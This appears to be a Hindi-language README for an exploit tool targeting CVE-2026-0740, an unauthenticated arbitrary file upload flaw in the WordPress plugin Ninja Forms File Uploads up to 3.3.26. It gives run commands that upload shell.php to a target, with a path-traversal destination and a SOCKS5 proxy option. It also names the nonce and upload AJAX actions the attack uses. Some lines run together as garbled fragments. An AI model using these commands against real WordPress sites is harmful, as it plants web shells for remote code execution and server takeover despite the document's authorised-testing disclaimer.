
Ninja Forms File Uploads <= 3.3.26 - बिना प्रमाणीकरण के मनमाना फ़ाइल अपलोड
CVE-2026-0740 एक अनऑथेंटिकेटेड (unauthenticated) आर्बिट्ररी फ़ाइल अपलोड (arbitrary file upload) भेद्यता है जो निम्न को प्रभावित करती है:
Ninja Forms File Uploads ≤ 3.3.26 (WordPress प्लगिन)
यह दोष हमलावरों को बिना प्रमाणीकरण के सर्वर पर मनमानी फ़ाइलें अपलोड करने की अनुमति देता है, जिससे संभावित रूप से रिमोट कोड निष्पादन (RCE) हो सकता है।
यह परियोजना केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए प्रदान की गई है।
इसका उपयोग उन सिस्टमों के विरुद्ध न करें जिनके स्वामी आप नहीं हैं या जिनके परीक्षण की स्पष्ट अनुमति आपके पास नहीं है।
लेखक दुरुपयोग या क्षति के लिए कोई ज़िम्मेदारी नहीं लेता है।
निर्भरताएँ स्थापित करें:
pip install httpx httpx-socks
python3 CVE-2026-0740.py -t http://target.com -f shell.php
python3 CVE-2026-0740.py \
-t https://victim.com \
-f shell.php \
-d ../../../../shell.php
admin-ajax.php के माध्यम से एक nonce का अनुरोध करता हैप्लगिन: Ninja Forms File Uploads
एंडपॉइंट: /wp-admin/admin-ajax.php
क्रियाएँ:
nf_fu_get_new_noncenf_fu_upload/wp-content/uploads/ निर्देशिका की निगरानी करेंयह परियोजना MIT लाइसेंस के अंतर्गत लाइसेंस प्राप्त है — विवरण के लिए LICENSE फ़ाइल देखें।
पुल रिक्वेस्ट (Pull requests) का स्वागत है। बड़े बदलावों के लिए, पहले एक issue खोलें ताकि चर्चा की जा सके कि आप क्या बदलना चाहते हैं।
| Argument | Description |
|---|
-t, --target | लक्ष्य URL |
-f, --file | अपलोड करने के लिए फ़ाइल |
-d, --dest | गंतव्य पथ (पाथ ट्रैवर्सल) |
-x, --proxy | SOCKS5 प्रॉक्सी |
-H, --headers | कस्टम हेडर |
--timeout | अनुरोध टाइमआउट |
--no-color | रंगीन आउटपुट अक्षम करें |
-q, --quiet | शांत मोड |
--verify-ssl | SSL सत्यापन सक्षम करें |